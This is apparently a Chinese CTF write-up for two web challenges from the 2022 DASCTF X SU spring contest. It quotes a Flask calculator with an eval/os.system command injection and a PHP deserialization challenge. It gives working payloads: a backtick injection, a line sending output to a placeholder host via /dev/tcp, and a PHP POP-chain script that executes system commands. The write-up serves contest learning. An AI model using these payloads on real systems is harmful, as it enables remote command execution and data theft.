[Python知识库]2022DASCTF X SU 三月春季挑战赛web部分

calc

给了源码

app=Flask(__name__)
def waf(s):
    blacklist = ['import','(',')',' ','_','|',';','"','{','}','&','getattr','os','system','class','subclasses','mro','request','args','eval','if','subprocess','file','open','popen','builtins','compile','execfile','from_pyfile','config','local','self','item','getitem','getattribute','func_globals','__init__','join','__dict__']
    flag = True
    for no in blacklist:
        if no.lower() in s.lower():
            flag= False
            print(no)
            break
    return flag
    
@app.route("/")
def index():
    "欢迎来到SUctf2022"
    return render_template("index.html")
@app.route("/calc",methods=['GET'])
def calc():
    ip = request.remote_addr
    num = request.values.get("num")
    log = "echo {0} {1} {2}> ./tmp/log.txt".format(time.strftime("%Y%m%d-%H%M%S",time.localtime()),ip,num)
    
    if waf(num):
        try:
            data = eval(num)
            os.system(log)
        except:
            pass
        return str(data)
    else:
        return "waf!!"

    
if __name__ == "__main__":
    app.run(host='0.0.0.0',port=5000)  

简单看一下，黑名单过滤关键字符，括号都被过滤了，本想试着命令执行，看来行不通，何况过滤了这么多
思路：传系统命令到log，利用os.system去执行

需要注意将num后用#去注释

payload

1#`ls`

之后外带/tmp/log.txt数据即可
另一种方法，思路：

1.三个单引号闭合起来的地方会当作字符串处理

2.单引号闭合过滤后面内容

3.#过滤

payload

'''2'
ls> /dev/tcp/x.x.x.x/port
#'3'''> ./tmp/log.txt

换行因为过滤了空格，用换行符绕过

ezpop

<?php
class?crow
{
????public?$v1;
????public?$v2;
????function?eval()?{
????????echo?new?$this->v1($this->v2);
????}
????public?function?__invoke()
????{
????????$this->v1->world();
????}
}
class?fin
{
????public?$f1;
????public?function?__destruct()
????{
????????echo?$this->f1?.?'114514';
????}
????public?function?run()
????{
????????($this->f1)();
????}
????public?function?__call($a,?$b)
????{
????????echo?$this->f1->get_flag();
????}
}
class?what
{
????public?$a;
????public?function?__toString()
????{
????????$this->a->run();
????????return?'hello';
????}
}
class?mix
{
????public?$m1;
????public?function?run()
????{
????????($this->m1)();
????}
????public?function?get_flag()
????{
????????eval('#'?.?$this->m1);
????}
}
if?(isset($_POST['cmd']))?{
????unserialize($_POST['cmd']);
}?else?{
????highlight_file(__FILE__);
}

入口__destruct

f1=new what();

__toString中run()方法，两个类中都有
这里用mix中的run方法,然后crow里的__invoke到fin里的__call到mix里的get_flag

payload

<?php
class crow
{
    public $v1;
    public $v2;

    public function __construct($v1)
    {
        $this->v1 = $v1;
    }
}

class fin
{
    public $f1;

    public function __construct($f1)
    {
        $this->f1 = $f1;
    }
}

class what
{
    public $a;

    public function __construct($a)
    {
        $this->a = $a;
    }
}
class mix
{
    public $m1;

    public function __construct($m1)
    {
        $this->m1 = $m1;
    }

}

$f = new mix("\nsystem('ls');");
$e = new fin($f);
$d = new crow($e);
$c = new mix($d);
$b = new what($c);
$a = new fin($b);
echo urlencode(serialize($a));

flag

flag{4d206c55-632f-430c-aeda-e60019260889}
not here, but it's close, think more.not here, but it's close, think more.not here, but it's close, think more.not here, but you are almost getting the flag!<?php